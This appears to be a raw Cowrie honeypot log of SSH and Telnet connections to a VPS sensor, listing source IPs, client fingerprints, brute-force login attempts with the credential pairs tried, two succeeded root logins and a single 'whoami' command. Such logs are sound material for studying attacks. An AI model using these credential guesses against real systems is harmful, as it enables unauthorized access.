{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:40:10.342284Z","src_ip":"115.190.94.119","session":"6867d85ac928"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123qwe","message":"login attempt [root/qwe123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:40:11.176472Z","src_ip":"115.190.94.119","session":"6867d85ac928"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58050,"dst_ip":"1.2.3.4","dst_port":22,"session":"571f8ae65f82","protocol":"ssh","message":"New connection: 212.227.125.160:58050 (1.2.3.4:22) [session: 571f8ae65f82]","sensor":"my-vps","timestamp":"2025-08-31T01:40:13.066397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:40:13.415507Z","src_ip":"212.227.125.160","session":"571f8ae65f82"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:40:13.416190Z","src_ip":"212.227.125.160","session":"571f8ae65f82"}
{"eventid":"cowrie.login.failed","username":"docker","password":"12345678","message":"login attempt [docker/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:40:15.380152Z","src_ip":"212.227.125.160","session":"571f8ae65f82"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:40:16.906801Z","src_ip":"212.227.125.160","session":"571f8ae65f82"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1303,"dst_ip":"1.2.3.4","dst_port":22,"session":"c93afaaecda0","protocol":"ssh","message":"New connection: 102.88.137.80:1303 (1.2.3.4:22) [session: c93afaaecda0]","sensor":"my-vps","timestamp":"2025-08-31T01:40:19.330971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:40:19.331678Z","src_ip":"102.88.137.80","session":"c93afaaecda0"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:40:19.455417Z","src_ip":"102.88.137.80","session":"c93afaaecda0"}
{"eventid":"cowrie.login.failed","username":"backend","password":"123","message":"login attempt [backend/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:40:19.984946Z","src_ip":"102.88.137.80","session":"c93afaaecda0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:40:21.109885Z","src_ip":"102.88.137.80","session":"c93afaaecda0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58948,"dst_ip":"1.2.3.4","dst_port":23,"session":"f33a2cf2db65","protocol":"telnet","message":"New connection: 212.227.125.160:58948 (1.2.3.4:23) [session: f33a2cf2db65]","sensor":"my-vps","timestamp":"2025-08-31T01:40:40.174615Z"}
{"eventid":"cowrie.session.closed","duration":12.619664907455444,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:40:52.794206Z","src_ip":"212.227.125.160","session":"f33a2cf2db65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59117,"dst_ip":"1.2.3.4","dst_port":23,"session":"eaace96bf3aa","protocol":"telnet","message":"New connection: 212.227.125.160:59117 (1.2.3.4:23) [session: eaace96bf3aa]","sensor":"my-vps","timestamp":"2025-08-31T01:40:53.019843Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49264,"dst_ip":"1.2.3.4","dst_port":22,"session":"1788cca4c932","protocol":"ssh","message":"New connection: 212.227.235.229:49264 (1.2.3.4:22) [session: 1788cca4c932]","sensor":"my-vps","timestamp":"2025-08-31T01:40:53.288477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:40:54.259079Z","src_ip":"212.227.235.229","session":"1788cca4c932"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:40:54.259786Z","src_ip":"212.227.235.229","session":"1788cca4c932"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":46932,"dst_ip":"1.2.3.4","dst_port":22,"session":"23c9d858892d","protocol":"ssh","message":"New connection: 82.67.125.95:46932 (1.2.3.4:22) [session: 23c9d858892d]","sensor":"my-vps","timestamp":"2025-08-31T01:40:55.252208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:40:55.252977Z","src_ip":"82.67.125.95","session":"23c9d858892d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:40:55.288635Z","src_ip":"82.67.125.95","session":"23c9d858892d"}
{"eventid":"cowrie.login.failed","username":"raju","password":"raju123","message":"login attempt [raju/raju123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:40:55.473231Z","src_ip":"82.67.125.95","session":"23c9d858892d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:40:56.511418Z","src_ip":"82.67.125.95","session":"23c9d858892d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123456789","message":"login attempt [docker/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:41:00.430305Z","src_ip":"212.227.235.229","session":"1788cca4c932"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:02.377933Z","src_ip":"212.227.235.229","session":"1788cca4c932"}
{"eventid":"cowrie.session.closed","duration":12.74358081817627,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:05.763311Z","src_ip":"212.227.125.160","session":"eaace96bf3aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59323,"dst_ip":"1.2.3.4","dst_port":23,"session":"8328ca183280","protocol":"telnet","message":"New connection: 212.227.125.160:59323 (1.2.3.4:23) [session: 8328ca183280]","sensor":"my-vps","timestamp":"2025-08-31T01:41:05.962015Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39708,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bb500655ea0","protocol":"ssh","message":"New connection: 212.227.125.160:39708 (1.2.3.4:22) [session: 5bb500655ea0]","sensor":"my-vps","timestamp":"2025-08-31T01:41:16.073277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:41:16.457297Z","src_ip":"212.227.125.160","session":"5bb500655ea0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:41:16.458027Z","src_ip":"212.227.125.160","session":"5bb500655ea0"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123456789","message":"login attempt [docker/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:41:18.662036Z","src_ip":"212.227.125.160","session":"5bb500655ea0"}
{"eventid":"cowrie.session.closed","duration":12.834852695465088,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:18.796798Z","src_ip":"212.227.125.160","session":"8328ca183280"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59540,"dst_ip":"1.2.3.4","dst_port":23,"session":"0154078e91ac","protocol":"telnet","message":"New connection: 212.227.125.160:59540 (1.2.3.4:23) [session: 0154078e91ac]","sensor":"my-vps","timestamp":"2025-08-31T01:41:19.006974Z"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:20.285743Z","src_ip":"212.227.125.160","session":"5bb500655ea0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39283,"dst_ip":"1.2.3.4","dst_port":23,"session":"cbbf6ac4cd41","protocol":"telnet","message":"New connection: 212.227.125.160:39283 (1.2.3.4:23) [session: cbbf6ac4cd41]","sensor":"my-vps","timestamp":"2025-08-31T01:41:30.210888Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1311,"dst_ip":"1.2.3.4","dst_port":22,"session":"e20d79d0f84a","protocol":"ssh","message":"New connection: 102.88.137.80:1311 (1.2.3.4:22) [session: e20d79d0f84a]","sensor":"my-vps","timestamp":"2025-08-31T01:41:30.679943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:41:30.681841Z","src_ip":"102.88.137.80","session":"e20d79d0f84a"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:41:30.804764Z","src_ip":"102.88.137.80","session":"e20d79d0f84a"}
{"eventid":"cowrie.login.failed","username":"colin","password":"password","message":"login attempt [colin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:41:31.336840Z","src_ip":"102.88.137.80","session":"e20d79d0f84a"}
{"eventid":"cowrie.session.closed","duration":12.76002812385559,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:31.766929Z","src_ip":"212.227.125.160","session":"0154078e91ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59716,"dst_ip":"1.2.3.4","dst_port":23,"session":"121609ea30ea","protocol":"telnet","message":"New connection: 212.227.125.160:59716 (1.2.3.4:23) [session: 121609ea30ea]","sensor":"my-vps","timestamp":"2025-08-31T01:41:31.972339Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:32.462085Z","src_ip":"102.88.137.80","session":"e20d79d0f84a"}
{"eventid":"cowrie.session.closed","duration":13.83230710029602,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:44.043099Z","src_ip":"212.227.125.160","session":"cbbf6ac4cd41"}
{"eventid":"cowrie.session.closed","duration":12.732895612716675,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:44.705160Z","src_ip":"212.227.125.160","session":"121609ea30ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59939,"dst_ip":"1.2.3.4","dst_port":23,"session":"bff8d1e340c1","protocol":"telnet","message":"New connection: 212.227.125.160:59939 (1.2.3.4:23) [session: bff8d1e340c1]","sensor":"my-vps","timestamp":"2025-08-31T01:41:44.903309Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33618,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c1fe157f02b","protocol":"ssh","message":"New connection: 212.227.125.160:33618 (1.2.3.4:22) [session: 6c1fe157f02b]","sensor":"my-vps","timestamp":"2025-08-31T01:41:44.994446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:41:45.887936Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:41:45.888753Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60366,"dst_ip":"1.2.3.4","dst_port":22,"session":"703b3aeb0dc8","protocol":"ssh","message":"New connection: 217.72.205.35:60366 (1.2.3.4:22) [session: 703b3aeb0dc8]","sensor":"my-vps","timestamp":"2025-08-31T01:41:47.933740Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:41:47.934843Z","src_ip":"217.72.205.35","session":"703b3aeb0dc8"}
{"eventid":"cowrie.login.success","username":"root","password":"TUvi1010","message":"login attempt [root/TUvi1010] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:41:51.507056Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":53516,"dst_ip":"1.2.3.4","dst_port":22,"session":"510f836b5ef7","protocol":"ssh","message":"New connection: 82.67.125.95:53516 (1.2.3.4:22) [session: 510f836b5ef7]","sensor":"my-vps","timestamp":"2025-08-31T01:41:54.606857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:41:54.608057Z","src_ip":"82.67.125.95","session":"510f836b5ef7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:41:54.644771Z","src_ip":"82.67.125.95","session":"510f836b5ef7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:41:54.741327Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T01:41:54.742306Z","src_ip":"212.227.125.160","session":"6c1fe157f02b"}
